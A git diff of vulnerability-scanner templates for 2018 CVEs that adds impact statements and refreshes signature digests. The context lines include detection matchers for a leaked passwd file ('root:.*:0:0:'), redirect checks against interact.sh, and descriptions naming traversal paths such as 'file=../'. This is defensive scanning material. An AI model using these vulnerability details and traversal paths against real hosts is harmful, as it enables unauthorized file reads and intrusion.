diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml
index a50cb61f29..36d27fb37b 100644
--- a/http/cves/2018/CVE-2018-1335.yaml
+++ b/http/cves/2018/CVE-2018-1335.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected server.
   remediation: Upgrade to Tika 1.18.
   reference:
     - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100af5b3907d1999f7c14c1b1718ea5fbb6020c32c3b5801da97796a8115a8706a10221009f38702fe2d2d1ff2c13d01a4a2d89a24824d5e2425efc93a08645bfc7f5e3c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207021fa50afc6de338557b57d7aa37b6c87abe24ce1cb02ef5d530ac841cf1097022100efa68638f3441565a793eac0fee29f75d80eff1c0a1cca49d77e36d8a92ec312:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml
index 54b9e1877f..c2515f4352 100644
--- a/http/cves/2018/CVE-2018-13379.yaml
+++ b/http/cves/2018/CVE-2018-13379.yaml
@@ -5,6 +5,8 @@ info:
   author: organiccrap
   severity: critical
   description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
+  impact: |
+    An attacker can obtain sensitive information such as usernames and passwords.
   remediation: |
     Apply the necessary patches or updates provided by Fortinet to fix the vulnerability.
   reference:
@@ -37,4 +39,4 @@ http:
         part: body
         regex:
           - '^var fgt_lang ='
-# digest: 4a0a00473045022100d368d28843e4b00033c043c35811a4e77d4a79fcef8dc56e2bef1d9d56b0a07202206ec07dc52b7807036a4f176b8be54828ac613b55dc047e953c1a5d0559391b70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200f8a42452e53a5164f36e00127b700fc50aa2a7a570220127eb4723c66d55f25022100d4fa9709de322b21d33c9505402f90f12cf8d484495303c489c922c9c9681549:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml
index 0344cb476d..119d1e900d 100644
--- a/http/cves/2018/CVE-2018-13380.yaml
+++ b/http/cves/2018/CVE-2018-13380.yaml
@@ -5,6 +5,8 @@ info:
   author: shelld3v,AaronChen0
   severity: medium
   description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Fortinet to fix this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a85902d5579ecad098187cea202495c67d63287ef964f74ebed2183f62edae4b02201609cdd3a9fa92dcea6ab341e691f039beb0f0e66130ee955e855653ff6f6a67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ed83af5f3e347370c653d56a1d04ebe556ac9156b46b87e39b4e6df4242489f30221008399c5b5667cf68f66138b59d59ab2c7f22aa428660362b90413fc582a1541c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml
index 95c2a1720c..6e743b4d21 100644
--- a/http/cves/2018/CVE-2018-13980.yaml
+++ b/http/cves/2018/CVE-2018-13980.yaml
@@ -5,6 +5,8 @@ info:
   author: wisnupramoedya
   severity: medium
   description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
   remediation: |
     Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c145b24c88ef4304562418a71d6915618df942950d27d488248a0190122272470220060f5b0db592ebbfbb134621d5fbd07b277589ae47cca18de1de09c2574140b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fd3411082032af8bbb8b2257d19924985a982a9a8139579fcbba09b06005a8bd02206fcd7e7cf6ea345adecdd73ea79643aff0e5c5dc2e71ef38f9793dd9a3223432:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml
index fe6022022e..8d0f87fda2 100644
--- a/http/cves/2018/CVE-2018-14013.yaml
+++ b/http/cves/2018/CVE-2018-14013.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022010ee3f7738bcfa36bdfbe9263605f83f8a77987077e6db1e0d4dbf541019a52402202ee6210b0595692bee62527988cbfcf0b2cee65d8f7ac8bdfdf9fcabc230e414:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201f68e01812a6a2ac06cfbc727c2fc18af1f6d279cf8accaadb438dd8b388b2a4022100ce88ef90892dd6bc1304bb0e415d6f9b7fa3ffac32f17a6fd31d767a6a33303d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml
index 9c62a611dd..5243a776fb 100644
--- a/http/cves/2018/CVE-2018-14474.yaml
+++ b/http/cves/2018/CVE-2018-14474.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Upgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a0047304502210091964ceb545a7dba2616de624fee32cfe3aef44b6f70f43068fcebc768f3d27e02207af51ff5b1c7def7b0730fc7e0086b7cab86066b7abbdacae2440e61f29ae84d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100939a2b23e92686e811d38e50bccc1e8bacff3c62f7cf7d4130426cb89e596cfa022100d864cfe4a0f5417f096a11f107dc90a9738d28055e0666a485155a1de3ffdfbb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml
index 14cc22a218..7d83ed2fec 100644
--- a/http/cves/2018/CVE-2018-14574.yaml
+++ b/http/cves/2018/CVE-2018-14574.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If  django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities.
   remediation: |
     Upgrade to the latest version of Django or apply the relevant patch provided by the Django project.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 301
-# digest: 4a0a004730450220675fcf2003c58b0f4a17cc9c464bc2258c400f20dc83ba8521fd7ef9e1abf684022100a2d7b2fdc63dee5dd50aaccf1c4436adedf8d0a9ab521643850229f86ecda5bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008eb325406f3b381f24b0138441f39ebbe9f1c4232104f304ff132c5e75e3335302210099c15fb6ce8201c103a69788ee4eb4a1f27e39257ae40078ddea19e80b821e14:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml
index 1a175e174e..e04fd74fed 100644
--- a/http/cves/2018/CVE-2018-14728.yaml
+++ b/http/cves/2018/CVE-2018-14728.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
+  impact: |
+    An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
   remediation: |
     Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 490a0046304402205ba0061904ecc9d617b9914382463267a0fba619544849766dafb0e4a1f6b19b022021ba4533ec0dc1ee326d07126f866be17d69b9b2f1bc60d3b5576e98c2e3aef2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022014ff41efa0fa46b999efc7034d1de4b1d83688c6a8d4625f3fb73937ccc37dcb02205de22757069bbe19e3f8bb95c3157aca4b616feafff7108e867a0a7f467cc410:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml
index add54978c8..f6488ad9ff 100644
--- a/http/cves/2018/CVE-2018-14916.yaml
+++ b/http/cves/2018/CVE-2018-14916.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: critical
   description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the device.
   remediation: |
     Upgrade the Loytec LGATE-902 device to version 6.4.2 or later to mitigate the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e93698b59ae2043cd7b2c24d0aa1f3fee7fe1ab9463a716112cb8e6314bd822c022016a935afcf0994c6e6808e1824dc34e7222c6b1264bca56b1c283692ad227fc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a0a4114bdb83e7e6cc14c9982396554803968368529bdd011bc3b5153ac5042b022006d47aab742e1084692b36198078d7fd3480ad0d997e3569a400d7b257b6d5fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml
index 1b2341ccbd..db0d4fb837 100644
--- a/http/cves/2018/CVE-2018-14918.yaml
+++ b/http/cves/2018/CVE-2018-14918.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100cbe3295ee5e6574d7eb73d9160a3121080960ad83a3e0cb3fa9be183be9fe5e8022100db1bc0331ac2a2ca580ed7f98fb24ee38117d8dd72f88f05fdc60c7cb3749a31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ac5bdac032fa1f86830731897a94b28a6839ab4aef6bcf654490af18c7b89b8b022100dc1f6769b4f4e2f0a072fd6cf7c6103a9bc87c4bc69159a95323775ea6a034ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml
index df49ec5cf0..4865e4f279 100644
--- a/http/cves/2018/CVE-2018-14931.yaml
+++ b/http/cves/2018/CVE-2018-14931.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Polarisft to fix the open redirect vulnerability.
   reference:
@@ -34,4 +36,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100aed674e2aa9219b7edf4b423ae6cecedabe30806dcab19d673dc0294380598af02207dc3decfec02badfc4e477541125fed2cc76b33cfaa9895e688e376b07efb4c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100952f4e06b256687fdeb9f4452bfd8ca4b2fe74688a71dea5ef6cc6d690d426010221008c394a7c7c8d37003e53d08a217d17132481e414d91bb8fec18321be2366edfd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml
index 66e5c5d024..b1d4888710 100644
--- a/http/cves/2018/CVE-2018-15138.yaml
+++ b/http/cves/2018/CVE-2018-15138.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202f124248993872edb7264ac5a39ac4d40f4342cec3beb2e0f1de23376f92177b0220044de4625949ecd879b015d2954f6d6d0f5d1f7d984f89817ffaafb225499902:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b7bcf9a6f1c466fb9475a9a3067017085396a60a3ce03b48b78534d22f9cd60a02205882a1cd98063f2fa7d5ce7341ad0760f9b61fd37dca55237bc6699084135c94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml
index 46eb341021..1ea847bab5 100644
--- a/http/cves/2018/CVE-2018-15517.yaml
+++ b/http/cves/2018/CVE-2018-15517.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network.
   remediation: |
     Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager.
   reference:
@@ -36,4 +38,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4b0a00483046022100d66a4d99f5537882b6c9570f14bcef3de3f92fb899332e84faa67c4632a64b0f022100a319966f11754e509a726a3a7ab1b32b3d2e073ac490caff2b1492127977e17d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e348737b605b08be54e205caa8c5bab94855c04ab9eade358706b4709167b4bf022100c75c81f077961bd41bc6d037f8587b350bb3eab8bd2866d54c50beb721fc72be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml
index 110de1e143..fd7150c97c 100644
--- a/http/cves/2018/CVE-2018-15535.yaml
+++ b/http/cves/2018/CVE-2018-15535.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022005e6731e75b9f07892e106a164741f48ffd69783b1cca658544d40285422eee9022100ab32d3ebc539748ac788fea5c8bb2e4d89887cf1faf54888ac1f8706bb2507db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220008949825f275d63efd906265e62d12c7fbf214cd71d1a088371ed0186d4774d0221008bfadcfef8c5eff615186f26cf48f5fc7377e33e5417428297b76323f787d06c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml
index bffd345472..1ed9482828 100644
--- a/http/cves/2018/CVE-2018-15745.yaml
+++ b/http/cves/2018/CVE-2018-15745.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Upgrade to a patched version of Argus Surveillance DVR.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b5e1464fb61a895f4f9ca9b9c8f8996050502cd99bdd0f8df8cbc54d6c17399302200121d1e5efc868b0ed74fd0b8352ebbb66db1af0119735cd55f874e536d3461e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f6288b19120fdaa738aed697a4829c5d9b0fe554a829787bdc32524cda307310022100d6d0757761cada3d4070c3f656fb94c7dc20102669037c70944c9edb8e2ed9e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml
index d10dfab75d..d9d28de69d 100644
--- a/http/cves/2018/CVE-2018-15961.yaml
+++ b/http/cves/2018/CVE-2018-15961.yaml
@@ -5,6 +5,8 @@ info:
   author: SkyLark-Lab,ImNightmaree
   severity: critical
   description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
+  impact: |
+    Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to take control of the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by Adobe to fix this vulnerability.
   reference:
@@ -74,4 +76,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022027f3e1825c29bdfd98d3c206ae75ebc49d7afb72c7eb695eb460cce0a9628955022100bb2949edb9b9be4919f56dc23371c5a7cae7a8987e309287a281b4a802cbf162:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202ea3883204a4effb1a5a6528cb554f7cbac69a7b5e7a10098686e742f128cfc8022100f88820e3ea537d64a035cfa822a942de6c1bbc332b57bd38d2e45129a1e03990:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml
index 72b34defed..5e3aa4e6fb 100644
--- a/http/cves/2018/CVE-2018-16059.yaml
+++ b/http/cves/2018/CVE-2018-16059.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a3fb19119f16e5d0c22dcf53221632b41bb51e451223c97dc138f5dfcd04f1ec022100f0a53833bc0aac40ab450c5c2386fb166ecc87d603d24d1b40d5b03fc2b531d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200bfc10d29eb9db4a52fd0ff17235654873176c4e7b8bf8d17a7d42e698a1d54c022100b8f6c1a7a225b6b7a9c6b392c59ef6a1de05c0007211c4402c9248c4b12abb5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml
index 792ad44ca5..d366cafeaf 100644
--- a/http/cves/2018/CVE-2018-16133.yaml
+++ b/http/cves/2018/CVE-2018-16133.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.
   reference:
@@ -41,4 +43,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 490a00463044022079074c50ec90bedfcc6743c1ac875ae6d6c9c545d9a67733d11e4aa5d67d237f0220138f274e6923fba65634392a617360a81b291249ed00ddad5e402ef8a7b3dbad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100edc7c7acd7e9ddc8f6d19c366651d30ec02b31f2a47e4d95062c11d2b10dd2af022100a6690a7c1cf14bfc7e282c557704e8e67689cecb4da7ded13590108920be6e78:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml
index bfe45ccd02..377a36b891 100644
--- a/http/cves/2018/CVE-2018-16139.yaml
+++ b/http/cves/2018/CVE-2018-16139.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022011e1a765f78fed23e65557fd3954ded3d5d56fbbf2e62ad41c8737fc5f991a2f02210097539b4f1de19c0c7a313c6f7b1bd72b917df57c0b0597ace27bdf5c3a522992:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f7cecd18d3bc31ddf34dc595afa19c5d22c668abd3ef2ef12f0e82cd3e486df1022100f7b1ad1b18cc5e23c63868452b90d0ff7c62138abf09559d515910fcccbfcb45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml
index 9dba71fb60..e18ef2c29e 100644
--- a/http/cves/2018/CVE-2018-16159.yaml
+++ b/http/cves/2018/CVE-2018-16159.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
   remediation: Fixed in version 4.1.8.
   reference:
     - https://wpscan.com/vulnerability/9117
@@ -47,4 +49,4 @@ http:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "images") && contains(body, "title")'
         condition: and
-# digest: 4a0a00473045022041da8934aef02c1d1921dd28d4740f84581635b25bacce8f4e9a8e52303a3672022100f24d15c54261799482bf921b35d233a0470b004afa0bfa6ddbeed750d8239037:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207e0c66bf2257b1f95bc3917f50ab45b30e6a4dd83496c1bf9b331e02bfaafc9f022100a199a8737d8081dc0061ef53e4d00eee14663a6e2991c07c59b70a9b574217f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml
index a151cf7b7d..dcd6ba14cc 100644
--- a/http/cves/2018/CVE-2018-16167.yaml
+++ b/http/cves/2018/CVE-2018-16167.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
   remediation: |
     Upgrade LogonTracer to a version higher than 1.2.0.
   reference:
@@ -41,4 +43,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - http
-# digest: 4a0a0047304502200c102b86b0c68d244cdbc942e8499c2982027c10621d2abf05b5798cc105647a022100ec9d36d36322b02bcf9c89f8391cc8400c2b188d8f869b1bf303940101617d68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207029b8ea7fa8c68f08425c2f54517e7d9f59d797a3269122bbd94131d8811baa02207c305c3139e642a717567be4d31ca357f108bc6d00d3217139e44fdd3c0ebfa2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml
index 9376a40400..6b101f82a3 100644
--- a/http/cves/2018/CVE-2018-16288.yaml
+++ b/http/cves/2018/CVE-2018-16288.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b986c0c96baa92b2372182af5c62f833fa4164809ce68f81b8ca61248be0a8de02204b6f26f2a367d767a4680ae1cb1cd006d4636a7ffbd70f4b3879bea08d857764:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022031367cb31d4dc9482f6cab37e2f94866dd9c92ba02eccc0e0a41648bf98cd15102206eb324e21841db77697ab3f3113bc4c6f724549d11eeb30741756870f42c1c0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml
index 5d1086b6bd..bac78bcc29 100644
--- a/http/cves/2018/CVE-2018-16299.yaml
+++ b/http/cves/2018/CVE-2018-16299.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Update to the latest version of WordPress Localize My Post plugin.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
